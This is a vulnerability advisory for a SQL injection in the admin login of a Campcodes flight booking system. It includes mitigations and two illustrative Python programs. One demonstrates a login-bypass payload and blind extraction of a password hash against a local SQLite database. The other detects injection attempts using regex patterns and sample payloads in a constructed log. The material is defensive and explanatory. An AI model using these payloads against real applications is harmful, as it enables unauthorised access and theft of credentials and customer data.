
CVE-2025-8952: SQL Injection in Campcodes Online Flight Booking Management System

Severity: Medium
Published: Thu Aug 14 2025 (08/14/2025, 08:32:08 UTC)
Source: CVE Database V5
Vendor/Project: Campcodes
Product: Online Flight Booking Management System

Description

A vulnerability was found in Campcodes Online Flight Booking Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/ajax.php?action=login of the component Login. The manipulation of the argument Username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

AI-Powered Analysis

Last updated: 08/14/2025, 09:03:10 UTC

Technical Analysis

CVE-2025-8952 is a SQL injection vulnerability in version 1.0 of the Campcodes Online Flight Booking Management System. It sits in the administrative login handler, the /admin/ajax.php endpoint invoked with action=login. The Username argument sent to that handler is placed into the database query without parameterisation or adequate sanitisation, so an attacker can change the structure of the query rather than merely its data. Because the login handler is, by its nature, reachable before authentication, the attack needs neither credentials nor any user interaction.

Injection into a login query typically allows two things: bypassing the credential check altogether, by closing the quoted username and commenting out the password clause, and extracting data from the backing database through UNION-based or blind techniques. Depending on the privileges of the database account the application uses, it may extend to modifying data or compromising the database server itself.

The CVSS 4.0 score of 6.9 (medium) reflects the ease of exploitation (network reachable, no privileges, no user interaction) combined with low confidentiality, integrity and availability impact ratings. The location of the flaw, the administrative login of a booking system, still means that successful exploitation exposes customer records, booking details and administrative functions. No in-the-wild exploitation has been reported, but the exploit has been publicly disclosed, which lowers the bar for opportunistic attackers. No vendor patch or workaround is listed, so affected deployments depend on compensating controls.
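To make the defect class concrete, here is an added example (my illustration, not the product's code; the Campcodes source is not shown on this page) that builds a login query two ways against an in-memory SQLite database: once by string concatenation, as the advisory describes for the Username argument, and once with bound parameters. The table, the account, the hashing scheme, the form field name and the payload strings are assumptions for illustration. It also carries the injection one step beyond authentication bypass, using the vulnerable login as a boolean oracle to recover the stored password hash one character at a time, which is why the impact of a login injection is not limited to logging in.

```python
"""Added example: the login-injection pattern described above, reproduced
against an in-memory SQLite database (illustrative, not Campcodes' code)."""
import hashlib
import sqlite3

HEX = "0123456789abcdef"


def hash_password(pw: str) -> str:
    # Illustrative hashing; the product's storage format is not known from the advisory.
    return hashlib.sha256(pw.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample schema with one admin account (assumption, not the product's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", hash_password("S3cret!")))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-built query: whatever is in 'username' becomes part of the SQL text.
    Returns the matched username, or None. This is the defect class the advisory describes."""
    sql = (f"SELECT id, username FROM users WHERE username = '{username}' "
           f"AND password = '{hash_password(password)}'")
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterised query: the driver sends the values separately from the SQL text,
    so quotes and comment markers in 'username' are data, never syntax."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, hash_password(password))).fetchone()
    return row[1] if row else None


def leak_hash_prefix(conn, length: int) -> str:
    """Boolean-based blind extraction through the vulnerable login: each probe asks
    'does the admin's stored password hash have character c at position pos?' and
    the login outcome is the oracle. Hex alphabet assumed because the sample stores hex."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX:
            probe = f"admin' AND substr(password, {pos}, 1) = '{c}' -- "
            if login_vulnerable(conn, probe, "irrelevant") == "admin":
                recovered += c
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "admin' -- ", "wrong"))  # admin
    print("safe:  ", login_safe(db, "admin' -- ", "wrong"))        # None
    print("leak:  ", leak_hash_prefix(db, 8))
```

Run it directly to see the bypass and the leak; the same payloads against login_safe return None because the driver transmits the username as a value rather than as SQL text. The trailing space after `--` in the payloads is deliberate: SQLite accepts `--` alone, but MySQL, which this class of PHP application usually runs on, only treats `-- ` followed by whitespace as a comment.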

Potential Impact

For European organizations using the Campcodes Online Flight Booking Management System, this vulnerability poses a significant risk to the confidentiality and integrity of sensitive customer and operational data. Flight booking systems typically handle personally identifiable information (PII), payment details, travel itineraries, and administrative credentials. Exploitation could lead to unauthorized data disclosure, financial fraud, disruption of booking operations, and reputational damage. Additionally, attackers could leverage the vulnerability to pivot within the network, potentially compromising other critical systems. Given the critical nature of the aviation and travel sector in Europe, such a breach could also attract regulatory scrutiny under GDPR for data protection violations, resulting in fines and legal consequences. The remote and unauthenticated nature of the vulnerability increases the likelihood of exploitation, especially if the system is exposed to the internet without adequate network-level protections.

Mitigation Recommendations

1. As an immediate stopgap, restrict access to /admin/ajax.php (and preferably the whole /admin/ tree) to trusted IP addresses or internal networks using firewall rules or VPN access; while no vendor fix is listed, this is the most effective control.
2. Deploy Web Application Firewall (WAF) rules that detect and block SQL injection attempts against the Username parameter of the login request. Treat this as a compensating control only: signatures can be bypassed and the query itself remains vulnerable.
3. Review the login code and rewrite the database access to use prepared statements with bound parameters, which removes the injection vector rather than filtering it, and run the application's database account with only the privileges it needs so that a residual injection cannot escalate to the database server.
4. Validate and constrain user-supplied input, especially in authentication flows (length limits, allowed character sets), as defence in depth on top of parameterisation.
5. Monitor web server, application and database logs for suspicious login traffic: quote characters, comment markers or SQL keywords in the username, bursts of login requests from one source, and database syntax errors, all of which indicate probing or exploitation.
6. Request an official patch from the vendor; if none is forthcoming, consider migrating to a flight booking platform with a better security posture.
7. Back up the database regularly and store the backups securely so that data tampering or loss can be recovered from.
8. Make administrative users aware of the risk and of the indicators of compromise so that exploitation is noticed and reported early.
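For the log-monitoring recommendation above, here is an added detection example (mine, not the vendor's or this page's) that scans a request log for injection attempts against the login endpoint named in the advisory. It assumes a hypothetical JSON-lines log in which a reverse proxy or WAF records the submitted form fields (an ordinary access log does not contain POST bodies, so the Username value would not be visible there), decodes URL-encoding before matching so that encoded and double-encoded payloads are caught, and does not flag an apostrophe on its own so that a legitimate user such as o'brien is not reported. The field name username, the IP addresses and every log line are constructed.

```python
"""Added example: flag SQL-injection attempts against the /admin/ajax.php
login endpoint in a request log (illustrative; log format is hypothetical)."""
import json
import re
from urllib.parse import parse_qs, unquote_plus

# Endpoint and action named in the advisory.
LOGIN_PATH = "/admin/ajax.php"
LOGIN_ACTION = "login"

# Quote-then-comment, quote-then-boolean, UNION SELECT and time-based probes.
SQLI_PATTERN = re.compile(r"""(?ix)
      ['"]\s*(?:--|\#|/\*)                      # admin' -- : truncate the rest of the query
    | ['"]\s*(?:or|and)\s+[\w'"]+\s*=           # ' OR 1=1 / ' AND 'a'='a
    | \bunion\s+(?:all\s+)?select\b             # UNION-based extraction
    | \b(?:sleep|benchmark|pg_sleep)\s*\(       # time-based blind probes
""")

# Constructed sample: one JSON record per request, as a reverse proxy or WAF that
# captures form fields might emit. Hypothetical format; passwords are not logged.
SAMPLE_LOG = """\
{"ts": "2025-08-14T08:30:01Z", "src": "198.51.100.7", "method": "POST", "path": "/admin/ajax.php", "query": "action=login", "form": {"username": "admin"}}
{"ts": "2025-08-14T08:30:09Z", "src": "198.51.100.7", "method": "POST", "path": "/admin/ajax.php", "query": "action=login", "form": {"username": "o'brien"}}
{"ts": "2025-08-14T08:31:15Z", "src": "203.0.113.5", "method": "POST", "path": "/admin/ajax.php", "query": "action=login", "form": {"username": "admin' -- "}}
{"ts": "2025-08-14T08:31:16Z", "src": "203.0.113.5", "method": "POST", "path": "/admin/ajax.php", "query": "action=login", "form": {"username": "%27%20OR%201%3D1%20--%20"}}
{"ts": "2025-08-14T08:31:20Z", "src": "203.0.113.5", "method": "POST", "path": "/admin/ajax.php", "query": "action=login", "form": {"username": "x%2527%2520UNION%2520SELECT%25201%2C2--"}}
{"ts": "2025-08-14T08:32:00Z", "src": "192.0.2.10", "method": "GET", "path": "/index.php", "query": "", "form": {}}
{"ts": "2025-08-14T08:32:30Z", "src": "192.0.2.10", "method": "POST", "path": "/admin/ajax.php", "query": "action=save_flight", "form": {"username": "' OR 1=1 -- "}}
"""


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo URL-encoding repeatedly so double-encoded payloads are inspected decoded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_login_request(rec: dict) -> bool:
    """True for POST /admin/ajax.php?action=login, the handler the advisory names."""
    if rec.get("method") != "POST" or rec.get("path") != LOGIN_PATH:
        return False
    return parse_qs(rec.get("query", "")).get("action", []) == [LOGIN_ACTION]


def classify(rec: dict):
    """Return the matched SQL fragment if the login username looks injected, else None."""
    if not is_login_request(rec):
        return None
    username = decode_fully(str(rec.get("form", {}).get("username", "")))
    m = SQLI_PATTERN.search(username)
    return m.group(0) if m else None


def scan(log_text: str):
    """Return (timestamp, source IP, decoded username, matched fragment) per flagged request."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        fragment = classify(rec)
        if fragment:
            hits.append((rec["ts"], rec["src"], decode_fully(rec["form"]["username"]), fragment))
    return hits


def sources_by_hits(hits):
    """Count flagged requests per source IP; a burst from one address is the usual shape."""
    counts = {}
    for _, src, _, _ in hits:
        counts[src] = counts.get(src, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(sources_by_hits(scan(SAMPLE_LOG)))
```

The three flagged lines all come from one source, which is the signal to act on: block the address at the edge and check the database and application logs for the same time window. The save_flight request is deliberately not flagged because the detector is scoped to the login handler; widening is_login_request to the whole of ajax.php would be the natural next step, since the advisory describes only the login action as affected but other actions of the same file are worth watching.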


Technical Details

Data Version: 5.1
Assigner Short Name: VulDB
Date Reserved: 2025-08-13T14:04:42.368Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 689da2b4ad5a09ad0058ed22

Added to database: 8/14/2025, 8:47:48 AM

Last enriched: 8/14/2025, 9:03:10 AM

Last updated: 8/21/2025, 12:35:15 AM


